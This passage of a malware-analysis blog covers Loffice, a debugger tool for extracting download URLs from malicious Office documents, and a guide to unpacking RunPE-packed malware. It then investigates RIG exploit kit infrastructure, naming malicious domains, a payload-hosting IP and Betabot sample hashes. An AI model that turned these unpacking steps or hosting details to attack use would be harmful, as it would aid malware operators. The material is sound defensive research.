<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin9x6oK2xaTlx2qfi_fb6D919W8N2UZvKU3obCHKJggz3hroyrIoRC_1fAdaAlW4zXMJxAuNd1ZjECiuDkmjTOTxLkFd_4nrNwuUCyoWcuAHeUBdjaC_8aS3VQ3E4d0dF90DE0Pg3Wv24/s1600/windbg-break.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin9x6oK2xaTlx2qfi_fb6D919W8N2UZvKU3obCHKJggz3hroyrIoRC_1fAdaAlW4zXMJxAuNd1ZjECiuDkmjTOTxLkFd_4nrNwuUCyoWcuAHeUBdjaC_8aS3VQ3E4d0dF90DE0Pg3Wv24/s400/windbg-break.png" width="400" /></a></div>
<br />
<br />
With execution halted on the first instruction in InternetCrackUrlW, the parameters to the function is available on the stack, including the URL. The URL is the first argument passed and is found on ESP+4 (as I'm running on 32-bit).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMijFsWqeP8CR1M5TG8UWQ9Me4VbL60Qk808XmgSWNmpt6IATlOIV_URFmeZ1Isg_9vW_vX1W31cgOMQK7a_HiWj8083mM9H1ZYBWgGZk1BO4tiUx55WqQFZHSKX7S9dF_ghXPAAs3zlg/s1600/windbg-uni.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMijFsWqeP8CR1M5TG8UWQ9Me4VbL60Qk808XmgSWNmpt6IATlOIV_URFmeZ1Isg_9vW_vX1W31cgOMQK7a_HiWj8083mM9H1ZYBWgGZk1BO4tiUx55WqQFZHSKX7S9dF_ghXPAAs3zlg/s400/windbg-uni.png" width="400" /></a></div>
<br />
<br />
So basically, without having to deobfuscate any code or uploading the document to a sandbox, a URL is found pointing to an executable which can be used to do further analysis.<br />
<br />
<h4>
</h4>
<h4>
Loffice - Lazy Office Analyzer</h4>
The beauty of WinDbg is that there is a Python module for controlling the debugger called <a href="http://winappdbg.sourceforge.net/">WinAppDbg</a>. If you haven't heard of or used it, I highly recommend looking into it, extremely useful.<br />
<br />
What's essentially needed is to set a breakpoint on InternetCrackUrl as soon as wininet.dll is loaded into memory and reading the URL when the breakpoint is hit.<br />
<br />
So I wrote a utility (Loffice) that makes use of this technique. It also includes a few other functions such as <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFileW</a> and <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx">CreateProcessW</a>, these will enable extraction of the file path which a file will be written to and also if any new processes are to be launched.<br />
<br />
WinInet isn't the only library that can be used to interact with an URL through macros and scripts, there is also WinHTTP, this is covered via <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa384092(v=vs.85).aspx">WinHTTPCrackUrl</a>, thereby covering both WinHTTP- and WinInet-based URL fetching.<br />
<br />
To make it more dynamic I added some options on how loffice should behave when hitting a breakpoint.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin6OftIerpUndxwd4hJN96KWBf6J21CiixskGJ9a21lz28EMADaqH2WkIpySRLXjqhraBH2S4vyukMNnPHqyO_UcXIYiFCjtk_u8of-mCuMm9k0T8tLS8Wz629ZBGSeqgVUK1ZSAt4h0Y/s1600/loffice.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin6OftIerpUndxwd4hJN96KWBf6J21CiixskGJ9a21lz28EMADaqH2WkIpySRLXjqhraBH2S4vyukMNnPHqyO_UcXIYiFCjtk_u8of-mCuMm9k0T8tLS8Wz629ZBGSeqgVUK1ZSAt4h0Y/s400/loffice.png" width="400" /></a></div>
<br />
Running loffice on a Word document and a Javascript "document":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqQ58pw3DARn_4xtWNFZtAYh0IEg3c977UjGOGdlHgRnUT9VfF5fzyZKzC2TKEaGbnUmNvjn7OMD6jYWCOQEW-OUFtgrFnwXcI5IV1JxsV0dT98qaVvZnm_b2yYk2sLbZGsglO_xF9lg/s1600/loffice-demo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqQ58pw3DARn_4xtWNFZtAYh0IEg3c977UjGOGdlHgRnUT9VfF5fzyZKzC2TKEaGbnUmNvjn7OMD6jYWCOQEW-OUFtgrFnwXcI5IV1JxsV0dT98qaVvZnm_b2yYk2sLbZGsglO_xF9lg/s400/loffice-demo.png" width="400" /></a></div>
<br />
<br />
One thing to note is that if loffice is told to exit on first URL extraction it would also exit if a new process is created. This is to make sure that control over the execution isn't lost to another process due to no URLs' found in the document.<br />
<br />
I'll look into using hooks instead of breakpoints later on to be able to control the results of HTTP-related calls which would enable a higher chance of extracting all of the URLs' in a document/script instead of only the first. This is useful if a document only fetch from the first URL if it succeds.<br />
<br />
<h4>
</h4>
<h4>
Summary</h4>
So this isn't really your stand-alone tool for static analysis but rather a utility for applying controlled dynamic analysis on documents and scripts.<br />
<br />
Rather than having to keep up with (de)obfuscation techniques, updating scripts or doing manual deobfuscation it's possible to let the host application do all the deobfuscation and take over when the interesting stuff such as HTTP requests are to be made.<br />
<br />
This does, as you might have figured out rely on WinDbg and Microsoft Office. <strike>There is currently only supported on 32-bit systems (for now).</strike><br />
<br />
<strike>This initial version is basically a proof of concept that I will continue to work on.</strike> If you've got any thoughts/comments/suggestions, let me know.<br />
<br />
<h4>
Small update on the project</h4>
So after some time I got around to do put some more work into this. The above details the background of the project, since then I've added support for detecting and bypassing some anti-analysis via WMI but also exit on process creation via WMI, which now should the most common ways of creating processes from macros/scripts.<br />
<br />
Loffice now supports 64-bit as well, I do however recommend that you don't mix winappdbg and Python version (32/64-bit), this is a warning from winappdbg the developer.<br />
<br />
Loffice is available on <a href="https://github.com/tehsyntx/loffice">Github</a>.Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com3tag:blogger.com,1999:blog-6803479147531086040.post-45519039667125565912015-09-21T12:25:00.000-07:002015-09-21T12:36:57.377-07:00Unpacking malware | Why should packers be a showstopper?Long time, no post... Even though lots is going on, I've had very little time to focus on a particular case, so I thought I'll leave a tip on how to unpack malware.<br />
<br />
Back in the days when I first got into malware analysis I was completely overwhelmed about all the tools and technique that one had to know about and how to apply. Being a fast-tracker, I just wanted to dive into the deep end of the pool and learn everything as I go, little did I now how much of a showstopper this would be when it came to analyzing packed malware.<br />
<br />
This post will give an example of how unpacking many of todays samples which are spread through both spam and drive-bys such as exploit kits. A post that at least I wished I've had come across while getting into malware analysis.<br />
<br />
<h4>
<b>RunPE and other injection based packers</b></h4>
<br />
RunPE is a well documented technique for running code inside another process, I will thereby not go into depth how it works.<br />
<b> </b><br />
Long story short is that the packer will deobfuscate/decrypt/unpack (take a pick) the malicious payload, start a new suspended process, inject the unpacked code and run it.<br />
<br />
There are some variations on how the packers run the unpacked code, for example creating a remote thread, changing the thread context (<a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms680632%28v=vs.85%29.aspx">SetThreadContext</a>) and calling <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms685086%28v=vs.85%29.aspx">ResumeThread</a> or by hooking ZwClose. These are just some example I've come across.<br />
<br />
The variations also goes for when writing the unpacked code to the newly created process. The most common way is by calling <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx">WriteProcessMemory</a>, but other ways are ZwWriteVirtualMemory or using <a href="http://undocumented.ntinternals.net/source/usermode/undocumented%20functions/nt%20objects/section/ntmapviewofsection.html">NtMapViewOfSection</a>.<br />
<br />
Now, what step remain to be given an example from? Creating a new suspended process. This is done by calling <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425%28v=vs.85%29.aspx">CreateProcess</a> with the flag CREATE_SUSPENDED.<br />
<br />
What is happening behind the scenes when calling any API that launch new processes, for example WinExec, CreateProcess, ShellExecute, etc. is that CreateProcessInternalW will be called, this is simply the lowest API for creating processes.<br />
<br />
So how can this be used to unpack malware that utilize these techniques?<br />
<br />
<h4>
<b>Unpacking using a debugger</b></h4>
<h4>
<b> </b></h4>
Immunity/Olly have all the functions for making unpacking easy:<br />
<ul>
<li>Breakpoints</li>
<li>Plugins (<a href="http://low-priority.appspot.com/ollydumpex/">OllyDumpEx</a>)</li>
<li>Binary Search</li>
</ul>
The majority of samples encountered that's using injection have had one thing in common, they all unpack their malicious payload before any new processes are created which means that setting a breakpoint at these process creating functions would allow the packer to unpack the malicious code to memory but break before any new processes are created.<br />
<br />
As the malicious code is now unpacked and present in memory, it's possible to search for it using Binary Search. Binary Search allows for search for ASCII-, UNICODE- and Hex-strings, this is helpful as a PE-header recognized by for example "<i>This program cannot be run in DOS mode</i>". There will be quite a few hits as the malware itself is loaded plus all the DLLs as seen in the sample below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVWEoS70n5RWzF1MCH5sSC9F2WJ4umPEBuJz8HEIA_2PPCIYzaLdUq7wmTNFiUN2FYm7JPiIg-bJ41dH5Rmi-DYr2okPXEmE3W-tj1jU3nrzpuLJdFrOj4_I26Fe-yhB2XS6mOF4_ODpU/s1600/memory_map.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVWEoS70n5RWzF1MCH5sSC9F2WJ4umPEBuJz8HEIA_2PPCIYzaLdUq7wmTNFiUN2FYm7JPiIg-bJ41dH5Rmi-DYr2okPXEmE3W-tj1jU3nrzpuLJdFrOj4_I26Fe-yhB2XS6mOF4_ODpU/s320/memory_map.png" width="320" /></a></div>
<br />
<br />
When there is a hit on a region which aren't associated with any module, chances are that this is the unpacked code. In the screenshot below, a breakpoint has been set on CreateProcessInternalW which triggered the debugger to break. The memory is then searched for the existence of a PE-header (Ctrl+B in the Memory Pane):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmXNlJUoQfpCjXbJ0d4ey1hfrh9WDatEYWYga6co3lKQVEvTT-JmP5AsyFT6Ib-f0IfLbGMKTaM7Xd8PSonxn5msC4nbJVrN9W06KFoZsw5nhosk2EnHxMUDkgCmB-yz9i_fFctT6reVY/s1600/memory_map_header.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmXNlJUoQfpCjXbJ0d4ey1hfrh9WDatEYWYga6co3lKQVEvTT-JmP5AsyFT6Ib-f0IfLbGMKTaM7Xd8PSonxn5msC4nbJVrN9W06KFoZsw5nhosk2EnHxMUDkgCmB-yz9i_fFctT6reVY/s320/memory_map_header.png" width="320" /></a></div>
<br />
Also note that there are other modules such as <i>wininet </i>loaded which wasn't there before. At this stage the PE can be extracted using the plugin OllyDumpEx that have the ability of searching a region for PE-headers and automatically parse it to identify sections but also dump the PE to disk:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggLrTB65QnfVVNFc6v2F61Qk4BHwQeaIz5uwXHUvsaeUGX382zqddLsvuxPBi932_URXuYEvfrGPiZWgfvtf2YmVWfaH6pAwv5R1dCA031LLM-ZLrVSGTh_zBwEqRS9nPE_vaGEQSGXWw/s1600/ollydumpex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggLrTB65QnfVVNFc6v2F61Qk4BHwQeaIz5uwXHUvsaeUGX382zqddLsvuxPBi932_URXuYEvfrGPiZWgfvtf2YmVWfaH6pAwv5R1dCA031LLM-ZLrVSGTh_zBwEqRS9nPE_vaGEQSGXWw/s320/ollydumpex.png" width="320" /></a></div>
<br />
That's basically all there is to it, by taking these very few steps, CryptoWall 3.0 have been unpacked and functions identified which is related to communication/domain generation:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv1dQ62pu4wWnLQUnHJN4wtWtdWd7nUVtGnFml2gaO0fb9pNclpKRqE9b2HOOsZecvdj_R8uaBF90X1KYAIapwe7zXqddcr9Z9_7-huRQ7xVryejmwDLvOim7GEOnkNU7ENkiXPOWYN38/s1600/domains_unpacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv1dQ62pu4wWnLQUnHJN4wtWtdWd7nUVtGnFml2gaO0fb9pNclpKRqE9b2HOOsZecvdj_R8uaBF90X1KYAIapwe7zXqddcr9Z9_7-huRQ7xVryejmwDLvOim7GEOnkNU7ENkiXPOWYN38/s320/domains_unpacked.png" width="320" /></a></div>
<br />
As the the dumped sample is clean, which means no reconstruction of the IAT is required, it's also possible to run it in a debugger to investigate in more depth how it behaves without having to step through the packers code and handle injections into other processes.<br />
<br />
I hope someone will find this post useful, again, it's nothing new, just a tip on how malware could be unpacked and how to handle packers utilizing the RunPE technique.<br />
<br />
Thanks <a href="https://twitter.com/malware_traffic">@malware_traffic</a> for providing the sample used in the post, it can be found <a href="http://www.malware-traffic-analysis.net/2015/09/14/index2.html">here</a>.Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-19812140151040603602015-02-26T10:09:00.002-08:002015-02-26T10:42:20.405-08:00A dive into the wake of the RIG EK leakNot long ago it became clear that parts of the exploit kit RIG was leaked, including both source code (admin) and database. <a href="https://twitter.com/MalwareTechBlog">@MalwareTechBlog</a> wrote a post which summarizes the <a href="http://www.malwaretech.com/2015/02/rig-exploit-kit-possible-source-code.html">story behind the leak</a>.<br />
<br />
As the database included actual traffic and details from where the traffic was coming from it was possible to do some digging into in the origins of the redirects.<br />
<br />
I settled on one of the referers found in the database as it was still active; <i>oxprxt.tk</i> which at the time of writing has been taken offline (domain does not resolve anymore). However, I will cover what was available and what data that has been collected during the analysis.<br />
<br />
The flow which is associated with the referer was "51" and well, its not that impressive in terms of traffic volume, however, since more than 0 exploits launched, it gives the possibility of an infection:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpjAClRVv5WozfY6INlqbDYKLZPSvXyOqyY7Pp10wYatv4DqSTRTou4iqfonbtp3Y2shJqvawdOLj3-8MCVSdVLaw93HPygaITyE4EkTAYBARukQyxpirLuPXoluURrD0eg6dWlLdR1Gg/s1600/rig_stats.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpjAClRVv5WozfY6INlqbDYKLZPSvXyOqyY7Pp10wYatv4DqSTRTou4iqfonbtp3Y2shJqvawdOLj3-8MCVSdVLaw93HPygaITyE4EkTAYBARukQyxpirLuPXoluURrD0eg6dWlLdR1Gg/s1600/rig_stats.png" height="320" width="307" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Flow 51</td></tr>
</tbody></table>
This particular flow is associated with a user called <i>"GenocideUID1971983"</i> which can be broken down into <i>Genocide </i>and <i>UID</i><i>1971983 </i>where the UID correlates to a user on a well-known hacking forum. This correlation also applies for the rest of the users except one in the leaked database.<br />
<br />
I guess the seller wanted to make sure to keep track on which users that he had sold to, and reading the story about the leak and the posts related to the service it show signs of that it was targeted for sales on one particular forum.<br />
<br />
<h4>
Dive! Dive! Dive!</h4>
Accessing oxprxt.tk directly gives a fake webcam chat page. What happens in the background is a totally different thing.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwZdLTr4Jd6SLKtgRqxJPlsz_eMZlpZEJybVfvzWWpRgAcQ6OocUkhPTawLaTwYBN1WWVAJUoadliAcPa-MwLjcqi50dfA1zepCWxfd26YEp-UMGAsQAe4lrqpLitl6vhwKxfoWvt6UDc/s1600/oxprxt.tk_landing.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwZdLTr4Jd6SLKtgRqxJPlsz_eMZlpZEJybVfvzWWpRgAcQ6OocUkhPTawLaTwYBN1WWVAJUoadliAcPa-MwLjcqi50dfA1zepCWxfd26YEp-UMGAsQAe4lrqpLitl6vhwKxfoWvt6UDc/s1600/oxprxt.tk_landing.png" height="172" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">First impressions while visiting oxprxt.tk</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
During the visit an error was generated related to PowerShell:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_MJ8sVocZVXv9YW5VXhP3q8y_r7UPkHXOBTvQnjzDP4u4kNgWeiKc5iaMHi2CszsVpUUwaAHAzTu9NJQ1UGXRzVObwsYB9tJo7endukjAdsSyEsRnlsEcDNU0umzhz-f6ZVJuUVKcf1o/s1600/powershell.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_MJ8sVocZVXv9YW5VXhP3q8y_r7UPkHXOBTvQnjzDP4u4kNgWeiKc5iaMHi2CszsVpUUwaAHAzTu9NJQ1UGXRzVObwsYB9tJo7endukjAdsSyEsRnlsEcDNU0umzhz-f6ZVJuUVKcf1o/s1600/powershell.png" height="58" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">PowerShell Error?</td></tr>
</tbody></table>
Three seconds later the page will redirect to a fake Adobe Flash Player update page:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGIXhudwT2cBado3LcXj5-kjQZVROupEw1HDyUwUoOAfkfYfZ3Xf_VntBe0mVtCJPsdNlGBGI9eiX381muYKLT7mpLsF5Cx39wU2KK-BNo4l2o02rSuWlXCCSqX0hJQ_b1SpCCvkFYSWs/s1600/fake_flash.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGIXhudwT2cBado3LcXj5-kjQZVROupEw1HDyUwUoOAfkfYfZ3Xf_VntBe0mVtCJPsdNlGBGI9eiX381muYKLT7mpLsF5Cx39wU2KK-BNo4l2o02rSuWlXCCSqX0hJQ_b1SpCCvkFYSWs/s1600/fake_flash.png" height="230" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Fake Adobe Flash Player update page</td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
Also, a request was generated in the background towards <i>jqueryapi.info</i>:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK2LUfF_Ch338Y5inhr6LW_z2BuDGrccwCPRHvEdO3zWXo2e5EpMwCsY_X9giw-90ly9l7nlzZfb6KZEucbyrh5BKwJJnXY6lR2Hq6JMc7AIcAReMkwVux2mIn4tnrKqMwR2XfoXzAbtg/s1600/jqueryapi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK2LUfF_Ch338Y5inhr6LW_z2BuDGrccwCPRHvEdO3zWXo2e5EpMwCsY_X9giw-90ly9l7nlzZfb6KZEucbyrh5BKwJJnXY6lR2Hq6JMc7AIcAReMkwVux2mIn4tnrKqMwR2XfoXzAbtg/s1600/jqueryapi.png" height="28" width="400" /></a></div>
<br />
<br />
<h4>
So...what happend?</h4>
The landingpage consists of a Javascript which is packed and obfuscated. First stage is a reversed, base64-encoded string which reveals another Javascript packed using a variant of the Dean Edwards packer.<br />
<br />
The page is split into two parts, one being the HTML and redirection, the other an exploit for <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332">CVE-2014-6332</a>.<br />
<br />
The deobfuscated script shows two different methods for redirecting the victim to the fake Adobe Flash Player page, one being a timeout refresh and the other a click (for the impatient ones):<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqzDlZdiitZexF1bZOc3KgWl3dPZoA210Pgw725zHFUxtKluthFk7NQ9YyBIch-VsVDQ1dIyaCzPEs93h7xkBocrQEPmX4F0nTezX5xUrfh6V_v05sclFO177nYIgKRZeLJfyqnAW-LtM/s1600/redirection_html.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqzDlZdiitZexF1bZOc3KgWl3dPZoA210Pgw725zHFUxtKluthFk7NQ9YyBIch-VsVDQ1dIyaCzPEs93h7xkBocrQEPmX4F0nTezX5xUrfh6V_v05sclFO177nYIgKRZeLJfyqnAW-LtM/s1600/redirection_html.png" height="122" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">HTML and redirection methods</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxrknb3wB0S3bIBDBP4V2SZXETcuwGUhzORyLBkSJaLkmnim0d6fXAHMuS5HVw5s7FDQsLXW_GJrqjJ-K7VLE5mcK0zBBUsAtvv-ta_rFezLvSyVhve9GVJ2a4IeqXmXHHCNoL-A-Ox_w/s1600/vbscript_fail.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxrknb3wB0S3bIBDBP4V2SZXETcuwGUhzORyLBkSJaLkmnim0d6fXAHMuS5HVw5s7FDQsLXW_GJrqjJ-K7VLE5mcK0zBBUsAtvv-ta_rFezLvSyVhve9GVJ2a4IeqXmXHHCNoL-A-Ox_w/s1600/vbscript_fail.png" height="56" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">CVE-2014-6332 exploit</td></tr>
</tbody></table>
The above images are just snippets of the page, the full decoded page is available on [<a href="http://pastebin.com/fQfGRB65">pastebin</a>]. An almost exact copy of the exploit can be found on Exploit-DB [<a href="http://www.exploit-db.com/exploits/35308/">1</a>] [<a href="http://www.exploit-db.com/exploits/35229/">2</a>].<br />
<br />
So a visitor can be redirected to the fake update page by either waiting more than 3 seconds or click the big "Click to CHAT"-button.<br />
<br />
The error generated was due to my VM not having PowerShell installed which made it impossible to execute and download <i>Update.exe</i>. However, that particular file is the same threat that is provided through the fake update page (more on that further on).<br />
<br />
The request that was made towards <i>jqueryapi.info </i>is quite interesting as it returns different results depending on the referer, however, the most interesting part is that one of the attempts generated the well-known cushion redirect:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsrCd323ULhI0KqAkhr6mzNeFX1doq8FO2Nshu8mYbCzZOIySuk2NTyhnC6Xu-G3I6ug7ICGchACNeWCu_UZcCFUIWhz2vb9FWEvJLbdMT6A8iEXwxO6aPgimHx6FQOPN_nSv3x2w4gfU/s1600/windigo_cushion_redirect.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsrCd323ULhI0KqAkhr6mzNeFX1doq8FO2Nshu8mYbCzZOIySuk2NTyhnC6Xu-G3I6ug7ICGchACNeWCu_UZcCFUIWhz2vb9FWEvJLbdMT6A8iEXwxO6aPgimHx6FQOPN_nSv3x2w4gfU/s1600/windigo_cushion_redirect.png" height="56" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Redirect cushion <23 chars>.domain.tld</td></tr>
</tbody></table>
As this acts as some kind of rotator, its unclear on how many different locations it could redirect to.<br />
<br />
On the Adobe Flash Player page, a file <i>install_flashplayer16x32_mssd_aaa_aih.exe</i> ( <a href="https://www.virustotal.com/en-gb/file/e61f4a5b36aacca79053e71ebefa66bc22c5171e2210effe21946a9b3c397149/analysis/">d3014d0391fb9eccfccca288df6e11b8</a>) is offered for downloading. This is one of the many files which reveals itself to be Betabot (details further on).<br />
<br />
<br />
<h4>
So, what have been found so far?</h4>
<b>oxprxt.tk</b> <b>[</b><a href="https://www.virustotal.com/en/url/a1f1d7eddcf57af1d941053ae3b1ca6b3c0f2e0a6068f3790bf20d87bb5a699b/analysis/1424787444/">VT</a><b>] </b>- Redirection to fake Adobe Flash page + exploiting CVE-2014-6332.<br />
<b>jqueryapi.info</b> <b>[</b><a href="https://www.virustotal.com/en/domain/jqueryapi.info/information/">VT</a><b>]</b>- Works as a rotator.<br />
<b>54.207.49.189</b> <b>[</b><a href="https://www.virustotal.com/en/ip-address/54.207.49.189/information/">VT</a><b>]</b> - Hosting the payload (Betabot) for the CVE-2014-6332 exploit.<br />
<br />
<br />
<h4>
Time to poke the bear!</h4>
Digging deeper into the server hosting the payload it's found that there is more directories containing files with the same name (Update.exe) as well as a zip-archive named <i>Virus.zip</i> with an executable called <i>Virus.exe</i>.<br />
<br />
The directory structure when on first visit:<br />
<br />
<i>/backend/ateb/Update.exe</i> (<a href="https://www.virustotal.com/en/file/e61f4a5b36aacca79053e71ebefa66bc22c5171e2210effe21946a9b3c397149/analysis/">d3014d0391fb9eccfccca288df6e11b8</a>) - Betabot - Uploaded: 10th Feb<br />
<i>/backend/ateb/Update.exe</i> (<a href="https://www.virustotal.com/en/file/1e2017f054bd4ef9cd805a7758bfe610fe8d94e80ae349f5965c7eaa52dd72bb/analysis/">8cbf7cbcdbb24374d60eb95c11a489fc</a>) - Betabot - Uploaded: 17th Feb<br />
<i>/backend/im3/Update.exe</i> (<a href="https://www.virustotal.com/en/file/38ee886e8311ae2e26dae11455493777df02b1686464b78098220d3b6c881155/analysis/">911cfaba8fb33309e9f331ae3ebc5ca4</a>) -Imminent Monitor - Uploaded: 3rd Feb<br />
<i>/backend/Update.exe </i>(<a href="https://www.virustotal.com/en/file/b1b4085ebe7ce2d9779719ebda7b34edda82a60738b39152d48cb73b48b026a6/analysis/">e833c258841623fadc2953e09a8f1d60</a>) - Betabot - Uploaded: 3rd Feb<br />
<i>/Virus.zip <b>-></b> Virus.exe</i> (<a href="https://www.virustotal.com/en/file/ec1960f250ee814174a5f5b04e329e0c4d257c7f397a13f75f2d6991e9fc9568/analysis/">ce4946e36f82592320ba3a5d0c0e38f2</a>) - Betabot - Uploaded: 8th Feb<br />
<i>/urmom/pl.php</i> - Unknown, keeps loading until timeout is reached. - Uploaded: 29th Oct 2014<br />
<i>/Panel/ </i>- Andromeda Panel<br />
<br />
20th Feb a directory called <i>Farhan </i>was created which also included a zip-archive called Virus.zip, including an executable, Virus.exe (<a href="https://www.virustotal.com/en/file/555b12ac29bfb62de383d2323be5f2ed373dfb39c87546a037866d52b82095b2/analysis/">93d4053a4a8000ac07eac6cb1d80021e</a>) which also is Betabot.<br />
<br />
The Andromeda panel was identified through Virustotal results together with the analysis done by <a href="http://blog.fortinet.com/post/a-good-look-at-the-andromeda-botnet">Fortinet</a>:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi28rHWJz8J8-dPCmAJjsoX7FdoFgu5EIHlWUTWo41MQhtKLRve9K7195zAF7SGBWud71qleI2SwCD0FpB5u7YevqMFy5tK0be6GKXcozz7KH9ad78Vhsmls2i2weR-zKX0CB80CbYmCM/s1600/andromeda_panel_vt.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi28rHWJz8J8-dPCmAJjsoX7FdoFgu5EIHlWUTWo41MQhtKLRve9K7195zAF7SGBWud71qleI2SwCD0FpB5u7YevqMFy5tK0be6GKXcozz7KH9ad78Vhsmls2i2weR-zKX0CB80CbYmCM/s1600/andromeda_panel_vt.png" height="51" width="400" /></a></td></tr>
